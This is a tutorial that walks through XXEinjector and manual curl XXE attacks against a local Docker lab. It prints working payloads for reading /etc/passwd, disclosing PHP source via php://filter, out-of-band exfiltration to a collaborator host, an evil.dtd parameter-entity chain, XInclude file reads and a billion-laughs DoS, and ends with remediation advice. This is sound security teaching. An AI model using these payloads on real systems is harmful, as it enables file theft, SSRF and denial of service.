This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.
If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.
A note on the output you will see. Every example below was produced against
techearl-labs/xml-external-entity/xxe-basicon the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, parser configuration, and the failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g.172.27.0.3), the exact/etc/passwdcontents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to underLogs/. Those are illustrative, the structure underneath is what to follow.
The lab target
Pull and run the lab:
git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basicThe target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):
| Endpoint | Method | Behaviour |
|---|---|---|
/import.php | POST | Parses the XML body, echoes every <name> element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here. |
/upload-blind.php | POST | Same parser, response hard-wired to OK or Error. No content reflects back. This is the realistic shape of a backend XML processor. |
A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:
docker compose logs -f xxe-basic-collabThat log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.
Step 1: install XXEinjector
XXEinjector is a single Ruby script. Either clone the repo or grab the file:
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --helpThe tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.
Step 2: build the request template
XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:
POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0
XXEINJECT
Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).
For the blind endpoint you build a second template, identical apart from the path:
POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0
XXEINJECT
Save that as req-blind.txt. Both files sit next to where you run the tool.
Step 3: classic in-band file read
The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.
ruby XXEinjector.rb \
--host=127.0.0.1 \
--file=req.txt \
--path=/etc/passwd \
--direct=YES \
--verboseWhat each flag does:
--host=127.0.0.1is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.--file=req.txtis the request template from Step 2.--path=/etc/passwdis the file on the target's filesystem to read.--direct=YEStells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).--verboseprints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.
Output (abbreviated):
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd
XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.
A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
<bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XMLIf the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.
Step 4: PHP filter source disclosure
file:// reads files as bytes. That is fine for plain-text files but PHP source code never reaches you intact: the engine executes it before the filesystem layer ever sees the read, so a file:///var/www/html/import.php request comes back as the rendered HTML, not the source. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser base64 bytes instead of executed output.
XXEinjector has a built-in shortcut for exactly this:
ruby XXEinjector.rb \
--host=127.0.0.1 \
--file=req.txt \
--path=/var/www/html/import.php \
--direct=YES \
--phpfilter \
--verbose--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.
Output (abbreviated):
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>
[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php
cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific; wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.
Step 5: blind out-of-band exfil with a direct external entity
/upload-blind.php returns OK either way, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.
XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:
ruby XXEinjector.rb \
--host=xxe-basic-collab \
--file=req-blind.txt \
--oob=http \
--direct=YES \
--path=/etc/hostname \
--verbose--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.
In practice, since we are not letting XXEinjector be its own listener, the cleanest demo is to drive the payload manually with curl and watch the collaborator log. XXEinjector's value here is that the same shape generalises across hosts:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XMLResponse from the lab: OK. Response in the collaborator tail:
[collab] GET from 172.27.0.3 path=/?leak=fired
The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.
Step 6: why the textbook recursive-PE chain fails here
Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:
ruby XXEinjector.rb \
--host=xxe-basic-collab \
--file=req-blind.txt \
--oob=http \
--path=/etc/passwd \
--verboseThe payload XXEinjector builds is shaped like:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
%remote;
]>
<foo>x</foo>evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.
Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:
[collab] GET from 172.27.0.3 path=/evil.dtd
One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.
What that means for XXEinjector specifically:
- The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
- The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
- The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.
This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET pre-4.5.2, Python lxml with resolve_entities=True, Go encoding/xml configured to load external DTDs), the recursive-PE chain still works exactly the way XXEinjector expects. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.
Step 7: XInclude (no DOCTYPE, no entity declaration)
XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
<bookmark>
<name><xi:include href="file:///etc/hostname" parse="text"/></name>
<url>http://x</url>
</bookmark>
</bookmarks>
XMLThe response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").
Step 8: billion laughs (the default mitigation in action)
The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
<bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XMLResponse: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.
Step 9: session and re-runs
XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.
For bulk reads, XXEinjector's --enumports and --brute=/path/to/wordlist flags loop over destinations using the same payload shape. Useful when you have one entity primitive and you want to walk a known config-file list.
What I would do next on this target
In a real engagement after Step 5 the report writes itself:
- Confirm in-band XXE on
/import.php, multiple file-read primitives available (file://,php://filter). - Confirm PHP source disclosure via
php://filter/convert.base64-encode/on every file the application user can read. - Confirm blind OOB on
/upload-blind.phpvia direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach). - Confirm XInclude on
/import.phpas an alternative file-read path independent of entity hardening. - Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
- Recommend: pass
LIBXML_NONET(block network resolution) and never setLIBXML_NOENT, disable XInclude (do not call$dom->xinclude()), reject any XML body containing aDOCTYPEdeclaration at the application layer, run the XML processor with no outbound network access from its container.
The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.
Where to go next
- The XXEinjector cheat sheet for the full flag reference.
- The XML External Entity deep dive for the parser-by-parser matrix and the defence playbook.
- The blind XXE OOB techniques for the parser-version differences that decide whether the recursive-PE chain fires.
- The XInclude attacks for the independent attack surface that hardening external entities does not close.
- The billion laughs attack for the entity-expansion DoS variants.
- The best XXE tools list for 2026 for where XXEinjector sits relative to manual curl, Burp's XXE extension, and the newer scanners.
Sources
Authoritative references this article was fact-checked against.
- XXEinjector, project READMEgithub.com
- libxml2 release notesgitlab.gnome.org
- PortSwigger Web Security Academy, XXE injectionportswigger.net





